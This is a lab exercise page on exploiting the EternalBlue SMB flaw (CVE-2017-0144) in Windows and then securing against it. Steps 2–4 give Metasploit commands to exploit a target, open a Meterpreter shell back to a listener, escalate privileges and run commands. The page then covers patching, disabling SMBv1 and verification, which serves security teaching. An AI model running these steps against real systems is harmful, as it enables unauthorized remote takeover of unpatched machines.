Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 35: Exploiting Windows SMB Vulnerabilities (EternalBlue)

by | Jun 27, 2025 | 0 comments

Objective: Exploit the EternalBlue SMB vulnerability (CVE-2017-0144) to gain access to a remote Windows system, and learn how to secure SMB services.

Scenario: EternalBlue is a well-known SMB vulnerability that allows attackers to execute arbitrary code on unpatched Windows systems. It targets a flaw in the SMBv1 protocol. Your task is to identify vulnerable systems, exploit the vulnerability, and secure the system to prevent exploitation.

Lab Setup

  1. Environment:
    • A Windows machine vulnerable to EternalBlue.
    • A Kali Linux machine or Metasploit environment for exploitation.
  2. Tools Required:
    • nmap for network scanning.
    • Metasploit Framework for exploiting EternalBlue.

Lab Steps

Step 1: Identify Vulnerable Systems

  1. Use nmap to scan for SMB services on the network: nmap -p 445 --script smb-vuln* <target_ip>
    • Replace <target_ip> with the target’s IP address.
    • Look for results indicating vulnerability to EternalBlue: Host is likely VULNERABLE to MS17-010!
  2. Verify SMB version using smbclient: smbclient -L //<target_ip> -N

Step 2: Exploit the EternalBlue Vulnerability

  1. Open Metasploit on your attacker machine: msfconsole
  2. Load the EternalBlue exploit module: use exploit/windows/smb/ms17_010_eternalblue
  3. Set the required options: set RHOST <target_ip> set LHOST <your_ip> set LPORT <your_port>
    • Replace <target_ip> with the target’s IP address.
    • Replace <your_ip> and <your_port> with your listener details.
  4. Launch the exploit: exploit
  5. If successful, you will get a Meterpreter shell on the target machine.

Step 3: Escalate Privileges

  1. Check the current user: getuid
  2. Use Meterpreter’s privilege escalation module if needed: run post/windows/manage/priv_elevate
  3. Verify escalated privileges: getuid

Step 4: Execute Arbitrary Code

  1. Use Meterpreter to execute commands on the target system: execute -f cmd.exe -c
  2. Verify access to sensitive data or perform lateral movement.

Solution

Explanation:

  • EternalBlue exploits a buffer overflow in the SMBv1 protocol to execute arbitrary code.
  • Unpatched systems are vulnerable to remote code execution without authentication.

Prevention:

  1. Apply Security Updates:
    • Install the patch for MS17-010 from Microsoft.
  2. Disable SMBv1:
    • Use PowerShell to disable SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false
  3. Restrict SMB Access:
    • Block port 445 at the firewall to prevent external access.
  4. Monitor and Log SMB Activity:
    • Use intrusion detection systems (IDS) to monitor SMB traffic.
  5. Use Strong Authentication:
    • Ensure SMB connections require strong authentication mechanisms.

Testing and Verification

  1. Rescan the system with nmap to confirm it is no longer vulnerable.
  2. Attempt the EternalBlue exploit after applying patches to verify mitigation.
  3. Ensure SMBv1 is disabled and confirm using: Get-SmbServerConfiguration

Reflection

This exercise demonstrates the risks posed by unpatched SMB vulnerabilities like EternalBlue. By understanding how the exploit works and implementing mitigation strategies, you can enhance the security of Windows systems and prevent similar attacks.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *